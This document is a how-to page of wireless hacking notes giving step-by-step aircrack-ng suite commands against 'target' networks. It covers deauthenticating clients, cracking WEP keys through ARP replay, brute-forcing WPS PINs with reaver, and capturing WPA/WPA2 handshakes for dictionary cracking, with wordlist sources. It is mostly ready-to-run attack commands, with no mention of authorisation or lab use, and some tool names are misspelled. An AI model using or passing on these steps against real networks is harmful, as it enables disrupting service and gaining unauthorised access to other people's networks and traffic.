Wireless: Hack

man page: airodump-ng is used for packet capturing of raw 802.11 frames for the intent of using them with air‐ crack-ng. NOTE: Ctrl-c to exit. Syntax:

• General wireless packet sniffing is done with airodump-ng, part of the aircrack-ng suite.
• This will give you general information about the wireless networks around you.

Syntax:

airodump-ng [options] <interface name>

Must first enable monitor mode (see here). Then run (assuming interface name wlan0):

airodump-ng wlan0             # 2.4Ghz only, quicker
airodump-ng --band a wlan0    # 5Ghz, quicker
airodump-ng --band abg wlan0  # 5Ghz + 2.4Ghz, slower

Once you find a target network in the information provided by airodump, move on…

Here you specify the target network (BSSID + Channel) you want to play with…

Target One Specific Network: From the general sniff of all traffic you just did, copy the target BSSID and Channel number:

• Run it without –write filename if you just want to see the network and clients on that network.
• You will see two sections: the top is the network, the bottom shows the clients (“stations”) on the network.

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

This creates files in your current working directory (filename*.*).

• .cap file: data captured (everything sent to and from target network)
• If the router is set to encrypt, all the data captured will be encrypted

Wireshark: use it to analyze the data you captured… open the .cap file.

Deauthentication Attack: Disconnect any client from any network…

Tool: aireplay-ng

aireplay-ng --deauth=10000000 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# program     repeat lots        MAC: access point      MAC: client     wireless adapater

Option -a is the MAC address of the access point and -c the client machine on the network you are deauthenticating.

• Remember: to get a client MAC address, you run airodump-ng and specify the network in order to see all the clients. The clients show up in the second (lower) block of information, under STATION:

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X wlan0

This still may fail unless you are also running airodump-ng against the target network (the command just above).

• If your target is wired, you simply connect to it and you're in.
• If your target is wireless w/o encryption, you connect and you're in.
• If your target is wireless + encryption… you need to break in.

WEP: Wired Equivalent Privacy (Old & Easy)

Tool: aircrack-ng (used to crack WEP's Initialization Vector for the key stream)

• The IV is sent in plain text (24-bit randomly generated number)
• The IV is prepended (as a prefix) to the WEP key for decryption of packets
• IV + Key (password) = Key Stream

All you need to do is capture a bunch of packets (airodump-ng), analyze the captured IVs (aircrack-ng) and discover the WEP key.

1. Capture specific BSSID + Channel as above. Store capture in file.
   • The #DATA column shows the number of useful packets w/ unique WEP IVs.
   • The higher the number the more likely you'll be able to crack the key.
2. Run aircrack-ng against your airodump-ng capture (.cap) file.

aircrack-ng filename.cap

Take the key from aircrack (XX:XX:XX:XX:XX), remove the colons, and use that number to log into the network.

PROBLEM: If the network isn't busy enough, the #DATA will not increase enough.

SOLUTION: Generate your own traffic… force access point to generate new IVs.

• Run an “arpreplay” attack
• We cannot connect to the AP but we can associate with it.

TOOL: aireply-ng

1. Run airodump-ng against your target network (as above) in one term window:

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

2. Associate with this network with aireply-ng in another term window:

aireply-ng --fakeauth 0 -a [MAC of target router] -h [MAC of wireless adapter] wlan0
# run fake authentication attack once ("0")

3. Now communicate with the network with which you are associated via aireply-ng:

• Inject packets into router to force it to generate new IVs.
• Use an ARP reply/request attack…
• THEORY: capture an ARP packet, re-transmit it thus forcing the router to produce another packet with new IV. Lather, rinse, repeat.

aireply-ng --arpreplay -b [MAC of target router] -h [MAC of wireless adapter] wlan0

4. Then run aircrack-ng (filename should be something like arpreplay-01.cap)

aircrack-ng filename.cap

The only difference is the ecryption method: WPA uses TKIP and WPA2 uses CCMP. The same methods will work with both WPA and WPA2.

WPS (allows clients to connect without the password).

• Originally provided to simplify connecting printers and other peripherals.
• “PBC”: Push Button Configuration (peripherals and router had a WPS button).
• Authenticates against an 8-digit PIN (8 numbers). Easy hack.
• Router, however, must be misconfigured to use PIN authentication, NOT the PBC.
• Check this first (since WPA/WPA2 are so difficult to crack).

1. TOOL: wash (display all networks with WPS enable). You may need to put your wireless interface into auto mode instead of monitor mode.

wash --interface wlan0     # if this errors out, do the following...
ifconfig wlan0 down        # or ifdown wlan0
iwconfig wlan0 mode auto
ifconfig wlan0 up          # or ifup wlan0
wash --interface wlan0     # remember to change mode back to monitor for the hacks

2. Associate with the network (as above)… set this up but DO NOT RUN IT YET…

aireply-ng --fakeauth 30 -a [MAC of target router] -h [MAC of wireless adapter] wlan0
# associate with the target network every 30 seconds

3. In another term window run reaver to brute force the PIN:

reaver --bssid [MAC of target router] --channel [#] --interface wlan0 -vvv --no-associate

4. Launch reaver and then your aireply-ng you set up but did not run.

• If WPS is not misconfigured or PBC is set… then this won't work. Move on…

The only packets that can aid cracking WPA and WPA2 are the handshake packets.

• These are 4 packets sent when a client connects to the network.
• Here's the process…

1. Run airodump-ng against all reachable networks…

airodump-ng wlan0               # 2.4Ghz only, quicker
airodump-ng --band a wlan0      # 5Ghz, quicker
airodump-ng --band abg wlan0    # 5Ghz + 2.4Ghz, slower

2. Find your target router and run airodump-ng to dump data to a file…

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

3. Let it run and wait for the handshake to occur (someone to connect to router).

4. If you're impatient, deauthenticate a current user and he'll connect again, giving you the handshake you want.

aireplay-ng --deauth 4 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# program     repeat 4x   MAC addr router      MAC addr client to disconnect

5. Use that WPA handshake value to get the key for the wireless network (see next).

6. Wordlist: a very large text file of words to use against the handshake value

• You can either create one of your own or download one (or combine the two).

Create your own word list with crunch

crunch [min] [max] [characters] -t [pattern] -o [filename]   # syntax
crunch 6 8 123abc$ -t a@@@@b -o wordlist                     # example

**Links to wordlists:*

• ftp://ftp.openwall.com/pub/wordlists/
• http://www.openwall.com/mirrors/
• https://github.com/danielmiessler/SecLists
• http://www.outpost9.com/files/WordLists.html
• http://www.vulnerabilityassessment.co.uk/passwords.htm
• http://packetstormsecurity.org/Crackers/wordlists/
• http://www.ai.uga.edu/ftplib/natural-language/moby/
• http://www.cotse.com/tools/wordlists1.htm
• http://www.cotse.com/tools/wordlists2.htm
• http://wordlist.sourceforge.net/

7. Use aircrack-ng: wordlist + handshake to crack the password

• aircrack-ng will unpack the handshake and extract the useful information
• The MIC (Message Integrity Code) from the handshake is used by the access point to verify whether a password is correct or not.
• It will take each word in the wordlist, combine it with the information in the handshake, and generate a MIC.
• It will compare that MIC with the MIC in the handshake. If they match, your word is the password.
• TAKE-AWAY: Success depends on your word list.
• This will take a lot of time. If you have a GPU, it can be used to speed up the comparison process.
• Make sure you are in the directory with your airodump-ng .cap file (that captured the handshake) and the .txt wordlist…

aircrack-ng filename-01.cap -w wordlist.txt
#           |--> name of file from the airodump-ng

We'll have some more goodies later…